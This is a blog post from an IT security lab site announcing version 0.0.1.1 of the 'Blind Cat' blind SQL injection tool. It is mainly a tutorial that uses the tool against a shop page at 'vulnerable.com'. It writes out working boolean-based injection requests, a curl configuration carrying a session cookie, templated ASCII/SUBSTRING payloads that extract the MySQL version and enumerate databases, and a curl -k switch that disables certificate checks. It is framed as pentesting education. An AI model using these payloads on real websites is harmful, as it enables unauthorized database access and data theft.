IT Security Lab The Playground for IT Security Specialists and Pentesters

Blind Cat is Updated to 0.0.1.1. No More Problems With SSL Certificates!

Ok, It seems the Blind Cat tool was found to be pretty useful, so thanks all of you for downloading and testing! :-) If you don't know what is it - you are welcomed to read the previous article [here]. Recently I made some updates to the tool as during the last tests it happened that there were some issues when connecting to the target website over SSL. I think this is a good occasion to fix the thing (already done!) and explain one more time how everything works. You will see how easy is to exploit SQL injections with Blind Cat (if you know what you are doing...).

So how to use this blind... thing ;-)? Quick tutorial.

Before going further, download the new version 0.0.1.1 beta binary from [here]. Good. Now let's go through the test case step by step.

Step 1: Confirming SQL injection

So I am using Burp Suite and checking for SQL Injection in some well-know website. This is the HTTP header I am sending when testing "true" condition:

GET /shop/index.php?exec=serv&type=1&mid=15205%20or%201=1--%20&rand=2975386456123 HTTP/1.1
Host: vulnerable.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-GB; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-gb,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://vulnerable.com/shop/login.php
Cookie: PHPSESSID=8547113e62bf285f7f72e9688d098a54

...which gives me this:

Now I am changing the header and testing the "false" condition:

GET /shop/index.php?exec=serv&type=1&mid=15205%20or%201=2--%20&rand=2975386456123 HTTP/1.1
Host: vulnerable.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-GB; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-gb,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://vulnerable.com/shop/login.php
Cookie: PHPSESSID=8547113e62bf285f7f72e9688d098a54

...and the result is:

Very clean and nice example, right? To be sure we are really dealing with with SQL injection (not a kind of strange response from the web server) it does make sense to play some simple maths and send the following query (fragment of the header is below):

GET /shop/index.php?exec=serv&type=1&mid=15205%20or%205=(3+2)--%20&rand=2975386456123 HTTP/1.1
Host: vulnerable.com
...

Once the vulnerability is confirmed we may go forward and configure our CURL parameters. Note that I am sending GET request over HTTPS (it's important in our case).

Step 2. Configuring CURL

We should open curl.config file in our main Blind Cat folder and modify it the following way (keep attention to highlighted elements):

#-------------------------------------- custom header
-H "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5"
-H "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8"
-H "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7"
-H "Accept-Language: en-gb,en;q=0.5"
-H "Keep-Alive: 300"
-H "Content-Type: application/x-www-form-urlencoded"
-H "Referer: https://vulnerable.com/shop/login.php"
-H "Cookie: PHPSESSID=8547113e62bf285f7f72e9688d098a54"

#-------------------------------------- target URL
url https://vulnerable.com/shop/index.php?exec=serv&type=1&mid=15205%20or%201=1--%20&rand=2975386456123

#-------------------------------------- use proxy or not
#-x localhost:8080

#-------------------------------------- do we need a header to preview?
#--dump-header incoming_header.txt

Now we may run the batch file test_curl_settings.cmd which executes CURL with those parameters and stores the result in the file incoming_html.htm. We have 1=1 in our header, remember? Let's check the output file (should be some content there), then change the parameter to 1=2 and then check the output file again (now should be empty). If everything is working properly - now we are ready to extract the data from the back database!

Previous version of Blind Cat was not handling the crappy certificates properly, so in result you might have the following error:

So what I did, I let CURL completely ignore the certificates checking. SSL is still used but the certificate isn't verified anymore. So the appropriate tiny change was made in test_curl_settings.cmd file and in the Blind Cat's source code. FYI: curl.exe should be called the following way now:

curl --config curl.config -k

Simple. :-)

Step 3. Let's suck some data

Now we may try to extract some real data from the back system. For the beginning - classic: getting the SQL engine version number. Note: in this case we are dealing with MySQL. SQL query to be executed:

SELECT @@version

...which in our case transforms into something like this:

GET /shop/index.php?exec=serv&type=1&mid=15205%20or%201=(SELECT%20((SELECT%20ASCII(SUBSTRING(@@VERSION,<char_position>,1)))><char_value>))--%20&rand=2975386456123 HTTP/1.1
Host: vulnerable.com
....

Note that > is a "more" sign. Now let's try to list all databases. SQL query:

SELECT schema_name FROM information_schema.schemata

...magically transforms into:

GET /shop/index.php?exec=serv&type=1&mid=15205%20or%201=(SELECT%20((SELECT%20ASCII(SUBSTRING((SELECT%20schema_name%20FROM%20information_schema.schemata%20LIMIT%20<main_iterator>,1),<char_position>,1)))><char_value>))--%20&rand=2975386456123 HTTP/1.1
Host: vulnerable.com
....

The only difference in this case is that we will be reading the multi-line output line by line, so adding LIMIT <x>, 1. Just for any case, let me remind you one more time about where those values are taken from:

All right, this is it. Don't forget to get the new [binaries] and the [source code]. So happy hacking pentesting! :-)